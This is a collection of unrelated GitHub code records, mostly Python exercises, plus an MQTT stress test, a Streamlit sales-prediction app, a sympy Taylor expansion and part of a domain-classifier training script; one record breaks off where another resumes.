of a multi-leg journey from a \n# seperate file. Assume infor in the file is formatted correctly.\n\"\"\"Modify Programming Exercise 9 to get its input from a file.\"\"\"\n\ndef getFile():\n # Get the file name\n while True:\n try:\n infileName = input(\"\\nPlease enter your file name: \")\n except (SyntaxError, NameError, TypeError, ValueError):\n print(\"You have to enter a file name.\")\n continue\n break\n\n return infileName\n\ndef readFile(infileName):\n # Open the file\n infile = open(infileName, \"r\")\n\n legLength = []\n legFuel = []\n\n # Process each line of the input file to convert it to a list.\n for i, line in enumerate(infile):\n if i == 0:\n legLength.append(float(line))\n continue\n info = line.split()\n leg, fuel = float(info[0]), float(info[1])\n\n legLength.append(leg)\n legFuel.append(fuel)\n \n return legLength, legFuel\n \ndef calcMPG(legLength, legFuel):\n # Get and print the miles per gallon for each leg of the trip.\n i = 0 # Accumulator variable for list\n l = len(legLength)\n for entry in legLength:\n # Make sure the accumulator, i, is not out of the list's length\n if i + 1 < l:\n dist = legLength[i+1] - entry\n fuel = legFuel[i]\n mpg = dist / fuel\n\n print(\"Leg {0}: The MPG for this {1} mile leg is {2:0.1f} mpg.\"\\\n .format(i+1, dist, mpg))\n\n i += 1\n else:\n break\n # Get and print the miles per gallon for the entire trip.\n dist = legLength[-1] - legLength[0]\n # Reset the fuel variable to sum the entire list.\n fuel = 0\n for entry in legFuel:\n fuel = fuel + entry\n mpg = dist / fuel\n\n return dist, mpg\n\ndef main():\n\n print(\"This program reads the distance and fuel used to calculate the fuel \\\nefficiency of the overall trip and each leg.\")\n\n infileName = getFile()\n # Get the odometer readings and fuel used.\n legLength, legFuel = readFile(infileName)\n # Calculate and print the leg distance and mpg\n # Return the overall mpg and distance\n dist, mpg = calcMPG(legLength, legFuel)\n \n print(\"The overall MPG for this {0} mile trip is {1:0.1f} mpg.\"\\\n .format(dist, mpg))\n\nmain()\n","repo_name":"jeffvswanson/CodingPractice","sub_path":"Python/Zelle/Chapter8_LoopStructuresBooleans/ProgrammingExercises/10_FuelEfficiencyFromFile/mpgReadFromFile.py","file_name":"mpgReadFromFile.py","file_ext":"py","file_size_in_byte":2374,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36249881630","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n#Wersja optymalna \n\ndef nwd_v1(a, b):\n\n while a != b:\n if a > b:\n a = a - b\n else:\n b = b - a\n return a\n\ndef nwd_v2(a, b):\n \n while a > 0:\n a = a % b\n b = b - a\n \n return b\n \ndef nwd_rek(a, b):\n \n if b == 0:\n return a\n return nwd_rek(b, a % b)\n \ndef main(args):\n\n a = int(input(\"Podaj liczbę\"))\n b = int(input(\"Podaj liczbę\"))\n assert nwd_rek(5, 10) == 5\n assert nwd_rek(2, 5) == 1\n assert nwd_rek(4, 10) == 2\n print (\"NWD({:d}, {:d}) = {:d}\".format(a, b, nwd_rek(a, b)))\n print(\"Największy spólny dzielnik \", nwd_rek(a, b))\n\n return 0\n\n\nif __name__ == '__main__':\n import sys\n sys.exit(main(sys.argv))\n","repo_name":"Patrycja13/gitrepo","sub_path":"python/euklides.py","file_name":"euklides.py","file_ext":"py","file_size_in_byte":783,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"43728536323","text":"import sys\ninput=sys.stdin.buffer.readline\nimport os\nfrom math import*\n\nt=int(input())\nwhile t:\n\tt-=1\n\ta,b,n,m=map(int,input().split())\n\tif (a+b)<(n+m):\n\t\tprint(\"No\")\n\telse:\n\t\tif m<=min(a,b):\n\t\t\tprint(\"Yes\")\n\t\telse:\n\t\t\tprint(\"No\")\n\n\n","repo_name":"abusaeed2433/AllCode","sub_path":"Python/a_cookie_for_you.py","file_name":"a_cookie_for_you.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"4952406763","text":"menu = [\r\n \"1. Normal Character Generator\",\r\n \"2. Advanded Appearance Generator\",\r\n]\r\n\r\nselected = 0\r\n\r\ndef display_menu(menu, selected):\r\n for number, item in enumerate(menu, 1):\r\n if number == selected:\r\n print('(X)', item)\r\n else:\r\n print('( )', item)\r\n\r\nwhile True:\r\n display_menu(menu, selected)\r\n\r\n try:\r\n # don't assign directly to `selected` because user may choose wrong number\r\n new_selection = int(input(\"Please choose one of the menu options.\\n\"))\r\n\r\n if new_selection in (1, 2):\r\n # assign to `selected` when user choose correct number\r\n selected = new_selection\r\n\r\n display_menu(menu, selected)\r\n \r\n new = input(\"Would you like to make another selection? [Y/n]\").lower()\r\n\r\n if new in (\"n\", \"no\"):\r\n break\r\n else:\r\n print(\"Invalid Choice. Enter one of the menu numbers.\")\r\n except ValueError:\r\n print(\"Invalid Choice. Enter one of the menu numbers.\")\r\n","repo_name":"Keenonthedaywalker/Oblivion-Random-Character-Genarator","sub_path":"Oblivion Random Character Geenrator/menuTest.py","file_name":"menuTest.py","file_ext":"py","file_size_in_byte":1034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"3848740110","text":"'''\n@Description: \n@Version: 1.0\n@Autor: Henggao\n@Date: 2020-02-20 18:31:50\n@LastEditors: Henggao\n@LastEditTime: 2020-02-21 13:28:12\n'''\n\nimport random\n\nn = random.randint(0, 100)\n\nuser_guess = int(input(\"input your guess : \"))\n\nif user_guess > n:\n print(\"try smaller\")\nelif user_guess < n:\n print(\"try bigger\")\nelse:\n print(\"Bingo ,you get it\")\n\nprint(n)","repo_name":"genghenggao/Project2020","sub_path":"PythonDemo2020/输入测试.py","file_name":"输入测试.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"27789874755","text":"# Definition for a binary tree node.\nfrom typing import List\n\n\nclass TreeNode:\n def __init__(self, val=0, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\n\nclass Solution:\n def buildTree(self, preorder: List[int], inorder: List[int]) -> TreeNode:\n if not preorder or not inorder:\n return None\n left_node_cnt = inorder.index(preorder[0])\n root = TreeNode(preorder[0])\n root.left = self.buildTree(preorder[1:left_node_cnt + 1], inorder[:left_node_cnt])\n root.right = self.buildTree(preorder[left_node_cnt + 1:], inorder[left_node_cnt + 1:])\n return root\n\n\nif __name__ == '__main__':\n Solution().buildTree([3,9,20,15,7], [9,3,15,20,7])\n","repo_name":"mt3925/leetcode","sub_path":"Python/Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_name":"Construct_Binary_Tree_from_Preorder_and_Inorder_Traversal.py","file_ext":"py","file_size_in_byte":746,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"72577055821","text":"import requests\nimport base64\nimport torch\n\nfrom torchvision import transforms\nfrom .resnet import ResNetGenerator\nfrom urllib.parse import urlparse\nfrom PIL import Image, UnidentifiedImageError\nfrom io import BytesIO\n\n\ndef prepare_model():\n \"\"\"\n function for prepare generative model\n return model and preprocess\n \"\"\"\n netG = ResNetGenerator()\n\n model_path = './app/utils/horse2zebra_0.4.0.pth'\n model_data = torch.load(model_path)\n netG.load_state_dict(model_data)\n\n netG.eval()\n\n preprocess = transforms.Compose([transforms.Resize(256), transforms.ToTensor()])\n\n return netG, preprocess\n\n\ndef img_to_bin(im):\n \"\"\"\n function for encode image ti binary\n return binary object\n \"\"\"\n buffered = BytesIO()\n im.save(buffered, format=\"PNG\")\n bin_im = base64.b64encode(buffered.getvalue())\n return bin_im\n\n\ndef generate_zebra_from_image(user_img):\n \"\"\"\n function for generate zebra from horse-tensor\n return image of zebra\n \"\"\"\n\n net_G, preprocess = prepare_model()\n\n img = Image.open(user_img)\n\n horse_img_bin = img_to_bin(img)\n\n img_t = preprocess(img)\n batch_t = torch.unsqueeze(img_t, 0)\n\n batch_out = net_G(batch_t)\n\n out_t = (batch_out.data.squeeze() + 1.0) / 2.0\n out_img = transforms.ToPILImage()(out_t)\n\n zebra_img_bin = img_to_bin(out_img)\n\n return zebra_img_bin, horse_img_bin\n\n\ndef generate_zebra_from_link(user_url):\n \"\"\"\n function for generate zebra from horse-tensor\n return image of zebra\n \"\"\"\n net_G, preprocess = prepare_model()\n\n response = requests.get(user_url)\n try:\n img = Image.open(BytesIO(response.content))\n except UnidentifiedImageError:\n print('Something went wrong ... Try another link, or upload an image from your local device')\n\n horse_img_bin = img_to_bin(img)\n\n img_t = preprocess(img)\n batch_t = torch.unsqueeze(img_t, 0)\n\n batch_out = net_G(batch_t)\n\n out_t = (batch_out.data.squeeze() + 1.0) / 2.0\n out_img = transforms.ToPILImage()(out_t)\n\n zebra_img_bin = img_to_bin(out_img)\n\n return zebra_img_bin, horse_img_bin\n\n\ndef validate_url(url):\n try:\n result = urlparse(url)\n if all([result.scheme, result.netloc]):\n return url\n elif not url:\n return False\n else:\n print(\"it doesn't look like a picture link\")\n return False\n except AttributeError:\n return False\n","repo_name":"dKosarevsky/web-dev","sub_path":"art-idiot/backend/app/utils/zebrate.py","file_name":"zebrate.py","file_ext":"py","file_size_in_byte":2436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"36325362965","text":"import boto3\r\nimport json\r\nimport os\r\nif 'QUEUE_URL' in os.environ:\r\n QUEUE_URL = os.environ['QUEUE_URL']\r\nelse:\r\n raise Exception(\"Missing environment variable: QUEUE_URL\")\r\nROLE_ARNS=[\r\n \"arn:aws:iam:: interval:\n print('[end] mqtt_api_stress: MQTTClient,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c = MQTTClient(client_id, server, port=port, user=user, password=password, keepalive=keepalive, ssl=False,\n ssl_params={})\n c = MQTTClient(client_id, server, port=port, user=user, password=password, keepalive=keepalive, ssl=True,\n ssl_params={})\n utime.sleep(1)\n except Exception as e:\n print('runtimes:%s,MQTTClient:: %s||result_api:: False;' % (m,e))\n m += 1\n\n print('[start] mqtt_api_stress: MQTTClient&connect&disconnect;')\n start_time = utime.time()\n m = 1\n while 1:\n duration = utime.time() - start_time\n if duration > interval:\n print('[end] mqtt_api_stress: MQTTClient&connect&disconnect,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c.connect(clean_session=True)\n c.disconnect()\n c.connect(clean_session=False)\n c.disconnect()\n utime.sleep(1)\n except Exception as e:\n c.disconnect()\n print('runtimes:%s,connect&disconnect:: %s||result_api:: False;' % (m,e))\n m += 1\n\n print('[start] mqtt_api_stress: connect&subscribe&publish&disconnect;')\n start_time = utime.time()\n m = 1\n while 1:\n duration = utime.time() - start_time\n if duration > interval:\n print('[end] mqtt_api_stress: connect&subscribe&publish&disconnect,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c.connect(clean_session=False)\n c.subscribe(topic)\n c.publish(topic, msg)\n c.disconnect()\n c.connect(clean_session=True)\n c.subscribe(topic)\n c.publish(topic, msg)\n c.disconnect()\n except Exception as e:\n print('runtimes:%s,connect&subscribe&publish&disconnect:: %s||result_api:: False;' % (m,e))\n m += 1\n\n print('[start] mqtt_api_stress: set_callback&subscribe&publish&wait_msg;')\n start_time = utime.time()\n c.connect(clean_session=True)\n m = 1\n while 1:\n duration = utime.time() - start_time\n if duration > interval:\n print('[end] mqtt_api_stress: set_callback&subscribe&publish&wait_msg,runtimes: %s;' % m)\n break\n if duration % 100 == 0:\n print('keep running... current duration: %sH,runtimes: %s;' % (duration/3600, m))\n try:\n c.set_callback(sub_cb)\n c.subscribe(topic)\n c.publish(topic, msg)\n except Exception as e:\n print('runtimes:%s,set_callback&subscribe&publish&wait_msg:: %s||result_api:: False;' % (m,e))\n while True:\n # 等待服务器直到服务器无待处理消息,该函数是阻塞函数\n c.wait_msg()\n if state == 1:\n break\n else:\n print('runtimes:%s,wait_msg:: %s||result_api:: False;'% (m,state))\n m += 1\n c.disconnect()\n\n\nif __name__ == '__main__':\n api_stress()\n","repo_name":"learning-lte/quecpython-test-project","sub_path":"api_test_case/mqtt/mqtt_client_send_rev_stress.py","file_name":"mqtt_client_send_rev_stress.py","file_ext":"py","file_size_in_byte":6694,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"28073984489","text":"# 1. Crea una función para verificar si un número es par o impar y devuelva “El número es par” o “El número es impar” según corresponda.\n# ya Realizado\n\n# 2. Crea una función a la que pases un número como argumento, calcule el factorial de ese número y haga print del resultado.\n# Ya realizado\n\n# 3. Crea una función a la que se le pase un número como argumento, calcule la cantidad de dígitos y haga print de “La cantidad de dígitos es:” y el resultado total de dígitos.\n# PISTA: Para convertir un número a string usa el método str(). Te recordamos que para saber la longitud de una cadena utilizamos len()\n\na = input('Ingrese un numero para saber cuantos digitos tiene: ')\nprint(f'El número {a}, tiene {len(str(a))} digitos')\n\n# 4. Dada una lista de números, crea una función que devuelva el número máximo de la lista.\n\n\ndef busca_mayor(list):\n cont = 0\n for num in list:\n if num >= cont:\n cont = num\n print('El numero mayor es el: ', cont)\n\n\nLista = [2, 5, 6, 7, 8, 5, 4, 9, 5, 6, 2, 1, 3, 54, 4, 4, 2, 5, 6]\nbusca_mayor(Lista)\n\n\n# 5. Crea una función que, dado un número, sume los dígitos de ese número y devuelva el resultado.\n\ndef suma_numeros(cond1):\n sum = 0\n for contador in str(cond1):\n sum = sum + int(contador)\n print('La suma de los numeros introducidos es', sum)\n\n\nentrada = int(input('Ingrese un numero para que sus digitos sean sumados: '))\nsuma_numeros(entrada)\n\n# 6. Dados dos números, crea una función para encontrar el mínimo común múltiplo (MCM) de los dos números, que se les pasarán como argumento a la función, y devuelva el MCM.\n\n\ndef mcm(a, b):\n lista1 = []\n lista2 = []\n i = 1\n\n while True:\n lista1.append(str(a*i))\n lista2.append(str(b*i))\n for valores in lista2:\n if int(lista1[-1]) == int(valores):\n return int(valores)\n i += 1\n\n\nnum1 = int(input('Ingrese el primer numero: '))\nnum2 = int(input('Ingrese el segundo numero: '))\nprint(f'El Minimo común multiplo entre {num1} y {num2}, es :', mcm(num1, num2))\n\n# 7. Crea una función a la que, pasándole la base y la altura, calcule y devuelva el área de un triángulo.\n\n\ndef area_tri(num1, num2):\n area = int(0.5*num1*num2)\n return (print(f'El área del triangulo de base {num1} y altura {num2}, es: ', area))\n\n\nbase = int(input('Ingresa la base del triangulo: '))\naltura = int(input('ingresa la altura del triangulo: '))\narea_tri(base, altura)\n\n\n# 8. Crea una función que, dado un número, verifique si un número es positivo, negativo o cero.\n\ndef num_pnc(num):\n if num < 0:\n return (print('El numero es Negativo'))\n elif num > 0:\n return (print('El numero es Positivo'))\n elif num == 0:\n return (print('El numero es Cero'))\n\n\npnc = int(input('indique el numero para saber si positivo, negativo o cero: '))\nnum_pnc(pnc)\n\n\n# 9. Crea una función que, dada una palabra, cuente la cantidad de letras en una palabra.\n\ndef cuenta_palabra(pal):\n contador = 0\n for num in pal:\n contador += 1\n return (print(contador))\n\n\npalabra = input(\n 'escribe la palabra de la que quieres saber el numero de letras: ')\n\ncuenta_palabra(palabra)\n\n\n# 10. Crea una función que, dada una lista de números, convierta la lista de números a su valor absoluto.\n\ndef conversor_abs(lis):\n for contador in lis:\n lista_abs.append(abs(int(contador)))\n return (lista_abs)\n\n\nlista_num = []\nlista_abs = []\nwhile True:\n num = input('Inserte los numeros de la lista y finalice con \"fin\" ')\n if num == 'fin':\n break\n lista_num.append(num)\nprint(\n f'El valor absoluto de la lista {lista_num}, es: ', conversor_abs(lista_num))\n\n\n# 11. Crea una función que, dado un número, verifique si un número es primo.\n\n# ya Realizado\n\n# 12. Dados dos números, crea una función para encontrar el máximo común divisor (MCD) de esos dos números.\n\ndef mcd(num1, num2):\n def Mayor(a, b):\n if a > b:\n return (a)\n else:\n return (b)\n\n def Menor(b):\n if b < Mayor(num1, num2):\n return (b)\n else:\n return (num1)\n\n ma = Mayor(num1, num2)\n me = Menor(num2)\n\n while me != 0:\n # print(f' 1ro ma es:{ma}, y me es:{me}')\n resto = ma % me\n if me % resto != 0:\n # print(f' 2ro me es:{me}, y resto es:{resto}')\n ma = resto\n me = me % resto\n # print(f' 3ro ma es:{ma}, y me es:{me}')\n else:\n break\n return (resto)\n\n\nnum1 = int(input('pon el primer numero: '))\nnum2 = int(input('pon el segundo numero: '))\nprint('el Maximo Comun Dividor es: ', mcd(num1, num2))\n","repo_name":"jerc777/PreworkPython-Javier_Rivera_Cortes","sub_path":"Ejercicios/Ejercicios_funciones-bucles.py","file_name":"Ejercicios_funciones-bucles.py","file_ext":"py","file_size_in_byte":4694,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"7253674923","text":"#Longest Common perfix\n#flower flow flee => 2\n#Idea:\n#sort() list\n#check first and last word how much they match\n######CODE#########\nclass Solution:\n def solve(self, words):\n words.sort()\n res=''\n for i in words[0]:\n if words[-1].startswith(res+i):\n res+=i\n else:\n break\n return res","repo_name":"nikhilc2710/funprojects","sub_path":"Algoscripts/longestcommonprefirx.py","file_name":"longestcommonprefirx.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"43498821083","text":"# ================================== Importando Librerias =============================\nfrom pages.Modelo_ import bosque\nfrom pages.Modelo_ import handle_outliers\nfrom pages.Modelo_ import analizar_y_eliminar_ruido\n\nimport pandas as pd\nimport streamlit as st\nimport plotly.graph_objects as go\nimport plotly.express as px\n\n# Título de la página\nst.title(\" :date: Predicciones\")\n## espacio en la parte superior de la pagina\nst.markdown('', unsafe_allow_html=True)\n\n# Dividir la página en dos columnas\ncol1, col2 = st.columns(2)\n\n# Componente para cargar un archivo Excel\nuploaded_file = st.file_uploader(\":file_folder: Cargar archivo Excel\", type=[\"xlsx\", \"xls\"])\n# ================================================ Cargar Datos ===========================================================\n# Leer el conjunto de datos por defecto\ndf = pd.read_excel(\"./data/Diclofenaco-prediccion.xlsx\", engine=\"openpyxl\")\n# Carga el archivo y crea un DataFrame si se ha cargado un archivo\nif uploaded_file is not None:\n filename = uploaded_file.name\n st.write(filename)\n\n try:\n new_df = pd.read_excel(uploaded_file, engine=\"openpyxl\")\n new_df.columns = df.columns\n # Verificar la consistencia de las columnas y tipos de datos\n # verifica si la cantidad de columnas no es la misma.\n if len(df.columns) != len(new_df.columns):\n st.error(\"Error: El archivo cargado no tiene la misma cantidad de columnas que el archivo por defecto.\")\n # verifica si los nombres de las columnas no son iguales.\n elif all(df.columns == new_df.columns):\n st.error(\"Error: El archivo cargado tiene nombres de columnas incorrectos. Corrigiendo...\")\n new_df.columns = df.columns\n df = new_df\n st.success(\"El archivo se ha cargado con éxito.\")\n # verifica si los tipos de datos de las columnas no son iguales.\n elif not df.dtypes.equals(new_df.dtypes):\n st.error(\"Error: El archivo cargado no tiene el mismo formato de datos que el archivo por defecto.\")\n else:\n # Guardar y actualizar el nuevo DataFrame\n new_df.to_excel(\"../data/Diclofenaco-prediccion.xlsx\", index=False)\n df = new_df\n st.success(\"El archivo se ha cargado con éxito.\")\n except Exception as e:\n st.error(f\"Error al cargar el archivo: {str(e)}\")\nelse:\n st.warning(\"Ningún archivo se ha cargado, se utilizará un archivo por defecto.\")\n\n# Aplicar la función para manejar outliers\ndf['PRODUCTOS ALMACENADOS'] = handle_outliers(df['PRODUCTOS ALMACENADOS'])\n\n# Hacer predicciones con el modelo entrenado\nnuevos_datos = df[['MES', 'PRODUCTOS ALMACENADOS', 'GASTO DE ALMACENAMIENTO', 'DEMANDA DEL PRODUCTO', 'FESTIVIDAD']] # Columnas relevantes para la predicción\npredicciones = bosque.predict(nuevos_datos) + 10\n\n\n# Crear un nuevo DataFrame con las predicciones\ndf_predicciones = pd.DataFrame({\"PRODUCTOS VENDIDOS\": predicciones})\n\n# Agregar la columna de predicciones al DataFrame original\ndf_con_predicciones = pd.concat([df, df_predicciones], axis=1)\n\n# Crear una tabla con Plotly que incluya la columna de predicciones con formato de 2 decimales\nfig_predicciones = go.Figure(data=[go.Table(\n header=dict(values=list(df_con_predicciones.columns), fill_color='darkslategray', line_color='white', align='center'),\n cells=dict(values=[df_con_predicciones[col] if col != 'PRODUCTOS VENDIDOS' else df_con_predicciones[col].apply(lambda x: f'{x:.2f}') for col in df_con_predicciones.columns], \n fill_color=['dimgray' if col != 'PRODUCTOS VENDIDOS' else 'steelblue' for col in df_con_predicciones.columns],\n line_color='white', align='center',\n format=[None if col != 'PRODUCTOS VENDIDOS' else ',.2f' for col in df_con_predicciones.columns])\n)])\n\n# Estilo adicional para la tabla\nfig_predicciones.update_layout(\n margin=dict(l=0, r=0, b=0, t=0),\n)\n\n# Dividir la página en dos columnas\ncol1, col2 = st.columns(2)\n\nwith col1:\n # Mostrar la tabla con predicciones debajo de los gráficos\n st.subheader(\"Cantidad de Productos que se Venderán:\")\n st.plotly_chart(fig_predicciones)\nwith col2:\n\n # Crear gráfico de dispersión entre Demanda del Producto y Productos Vendidos Predichos\n scatter_predicciones = px.scatter(df_con_predicciones, x='DEMANDA DEL PRODUCTO', y='PRODUCTOS VENDIDOS',\n title='Diagrama de Dispersión: Demanda del Producto vs Productos Vendidos',\n labels={'DEMANDA DEL PRODUCTO': 'DEMANDA DEL PRODUCTO', 'PRODUCTOS VENDIDOS': 'PRODUCTOS VENDIDOS'})\n # Mostrar el gráfico de dispersión\n st.plotly_chart(scatter_predicciones)\n\n# ------------------------ Realizar Predicciones ---------------------------\n# Dividir la página en dos columnas\nleft_column, right_column = st.columns(2)\n\n# Columna izquierda: Gráfico de dispersión\nwith left_column:\n left_column.header(\"Gráfico de Dispersión\")\n scatter_fig = px.scatter(df_con_predicciones, x=\"DEMANDA DEL PRODUCTO\", y=\"PRODUCTOS VENDIDOS\", title=\"Productos Almacenados vs Productos Vendidos\")\n left_column.plotly_chart(scatter_fig)\n\n# Columna derecha: Formulario para ingresar nuevos datos y botón de predicción\nwith right_column:\n st.header(\"Ingresar Datos para Predicción\")\n # Filtrar las variables que no son consideradas ruido\n variables_no_ruido = nuevos_datos.columns\n new_data = {\n \"MES\": right_column.number_input(\"MES\", min_value=1, max_value=100,key=\"mes_input\"),\n \"PRODUCTOS ALMACENADOS\": right_column.number_input(\"PRODUCTOS ALMACENADOS\", min_value=0) if \"PRODUCTOS ALMACENADOS\" in variables_no_ruido else None,\n \"GASTO DE MARKETING\": right_column.number_input(\"GASTO DE MARKETING\", min_value=0) if \"GASTO DE MARKETING\" in variables_no_ruido else None,\n \"GASTO DE ALMACENAMIENTO\": right_column.number_input(\"GASTO DE ALMACENAMIENTO\", min_value=0) if \"GASTO DE ALMACENAMIENTO\" in variables_no_ruido else None,\n \"DEMANDA DEL PRODUCTO\": right_column.number_input(\"DEMANDA DEL PRODUCTO\", min_value=1, max_value=10) if \"DEMANDA DEL PRODUCTO\" in variables_no_ruido else None,\n \"FESTIVIDAD\": right_column.number_input(\"FESTIVIDAD\", min_value=0, max_value=1) if \"FESTIVIDAD\" in variables_no_ruido else None,\n \"PRECIO DE VENTA\": right_column.number_input(\"PRECIO DE VENTA\", min_value=0) if \"PRECIO DE VENTA\" in variables_no_ruido else None\n }\n\n # Botón para realizar predicción\n if right_column.button(\"Realizar Predicción\"):\n # Filtrar las variables que no son None (aquellas que no son consideradas ruido)\n new_data_filtered = {key: value for key, value in new_data.items() if value is not None}\n new_data_df = pd.DataFrame(new_data_filtered, index=[0])\n new_predictions = bosque.predict(new_data_df)\n # Estilo del cuadro de texto\n style = \"\"\"\n padding: 10px;\n background-color: #001F3F; /* Color plateado o gris claro */\n border: 2px solid #C0C0C0; /* Borde del cuadro */\n border-radius: 5px; /* Esquinas redondeadas */\n box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1); /* Sombra */\n color: #001F3F; /* Texto en azul oscuro */\n font-size: 18px; /* Tamaño de fuente más grande */\n \"\"\"\n\n # Imprimir predicción en el cuadro de texto con estilo\n st.markdown(f'
Predicción de Productos Vendidos: {new_predictions[0]:.2f}
', unsafe_allow_html=True)","repo_name":"EliazarNoaLlas/App-Random-Forest-Regression","sub_path":"src/app/pages/Predicciones.py","file_name":"Predicciones.py","file_ext":"py","file_size_in_byte":7585,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"73869315341","text":"from sympy import *\n\ninit_printing(use_unicode=True)\n# if you are using Jupyter Lab or Notebook, use the following line instead:\n#init_printing(use_latex=True)\n\nx = symbols(\"x\")\n\nf = cos(x)\n\nxi = pi/4\nxip1 = pi/3\nh = xip1 - xi\n\n# zeroth order\nf_approx = diff(f, x, 0).subs({x: xi}) # or simply call cos(xi)\n\nfor n in range(1,7): # from 1 to 6\n new_term = diff(f, x, n) * h**n / factorial(n)\n f_approx = f_approx + new_term\n pprint(f_approx)\n print(N(f_approx.subs({x: xi}))) # use N to force numerical expression\n\nf_true = N(f.subs({x: xip1}))\nprint(\"f_true = \", f_true)\nprint(type(f_true))","repo_name":"f-fathurrahman/ffr-MetodeNumerik","sub_path":"chapra_7th/ch04/chapra_example_4_2.py","file_name":"chapra_example_4_2.py","file_ext":"py","file_size_in_byte":602,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"47"} +{"seq_id":"26249715257","text":"\"\"\"Train classifier\nThis is the file for training a neural domain classifier. \n\nSimply run `python train_classifier.py` with the respective parameters.\nThis will call `training_engine_classifier.py`.\n\"\"\"\n\nimport logging\nimport os\nimport sys\nimport cv2\nimport numpy as np\nimport training_engine_classifier as training\nimport pdb\nimport argparse\nimport json\n\n\n# ===========================\n# CONSTANTS\n# ===========================\nKEY_BACKGROUND_LAYER = \"rgba PNG - Layer 0 (Background)\"\nKEY_SELECTED_REGIONS = \"rgba PNG - Selected regions\"\nKEY_RESOURCE_PATH = \"resource_path\"\nKEY_LAYERS = \"layers\"\nKEY_IMAGES = \"Image\"\nKEY_VALIDATION_RATIO = \"Val\"\n\n\nkPATH_IMAGES_DEFAULT = [\"datasets/experiments/MS73/training/images\", \"datasets/experiments/b-59-850/training/images\"]\nkPATH_REGION_MASKS_DEFAULT = [\"datasets/experiments/MS73/training/regions\", \"datasets/experiments/b-59-850/training/regions\"]\nkPATH_OUTPUT_MODEL_DEFAULT = \"Models/DomClass/MS73_cap.hdf5\"\nkBATCH_SIZE_DEFAULT = 8\nkPATCH_HEIGHT_DEFAULT = 256\nkPATCH_WIDTH_DEFAULT = 256\nkMAX_NUMBER_OF_EPOCHS_DEFAULT = 50\nkNUMBER_SAMPLES_PER_CLASS_DEFAULT = 1000\nkFILE_SELECTION_MODE_DEFAULT = training.FileSelectionMode.SHUFFLE\nkSAMPLE_EXTRACTION_MODE_DEFAULT = training.SampleExtractionMode.RESIZING\nkVALIDATION_RATIO_DEFAULT = 0.2\n# ===========================\n\n\ndef menu():\n parser = argparse.ArgumentParser(description='Fast trainer')\n\n parser.add_argument(\n '-psr', \n dest='path_src', \n help='List of paths of the source folders that contain the original images.',\n action='append'\n )\n\n parser.add_argument(\n '-prg', \n dest='path_regions', \n help='Path of the folder that contains the region masks.',\n action='append'\n )\n\n parser.add_argument(\n '-out',\n dest='path_out', \n help='Paths for the models saved after the training.',\n default=kPATH_OUTPUT_MODEL_DEFAULT\n )\n\n parser.add_argument(\n '-width',\n default=kPATCH_HEIGHT_DEFAULT,\n dest='patch_width',\n type=int,\n help='Patch width'\n )\n\n parser.add_argument(\n '-height',\n default=kPATCH_WIDTH_DEFAULT,\n dest='patch_height',\n type=int,\n help='Patch height'\n )\n\n parser.add_argument(\n '-b',\n default=kBATCH_SIZE_DEFAULT,\n dest='batch_size',\n type=int,\n help='Batch size'\n )\n\n parser.add_argument(\n '-e',\n default=kMAX_NUMBER_OF_EPOCHS_DEFAULT,\n dest='max_epochs',\n type=int,\n help='Maximum number of epochs'\n )\n\n parser.add_argument(\n '-n',\n default=kNUMBER_SAMPLES_PER_CLASS_DEFAULT,\n dest='number_samples_per_class',\n type=int,\n help='Number of samples per class to be extracted'\n )\n\n parser.add_argument(\n '-fm',\n default=kFILE_SELECTION_MODE_DEFAULT, \n dest='file_selection_mode',\n type=training.FileSelectionMode.from_string, \n choices=list(training.FileSelectionMode), \n help='Mode of selecting images in the training process'\n )\n\n parser.add_argument(\n '-sm',\n default=kSAMPLE_EXTRACTION_MODE_DEFAULT, \n dest='sample_extraction_mode',\n type=training.SampleExtractionMode.from_string, \n choices=list(training.SampleExtractionMode), \n help='Mode of extracing samples for each image in the training process'\n )\n\n parser.add_argument(\n '-val',\n default=kVALIDATION_RATIO_DEFAULT,\n dest='validation_ratio',\n type=float,\n help='Ratio of validation images used for training the models'\n )\n\n args = parser.parse_args()\n\n args.path_src = args.path_src if args.path_src is not None else kPATH_IMAGES_DEFAULT\n args.path_regions = args.path_regions if args.path_regions is not None else kPATH_REGION_MASKS_DEFAULT\n \n print('CONFIG:\\n -', str(args).replace('Namespace(','').replace(')','').replace(', ', '\\n - '))\n\n return args\n\n# Return the list of files in folder\n# ext param is optional. For example: 'jpg' or 'jpg|jpeg|bmp|png'\ndef list_files(directory, ext=None):\n list_files = [os.path.join(directory, f) for f in os.listdir(directory)\n if os.path.isfile(os.path.join(directory, f)) and ( ext==None or re.match('([\\w_-]+\\.(?:' + ext + '))', f) )]\n\n return sorted(list_files)\n\n# Return the list of files for each folder in a list of directories.\n# ext param is optional. For example: 'jpg' or 'jpg|jpeg|bmp|png'\ndef 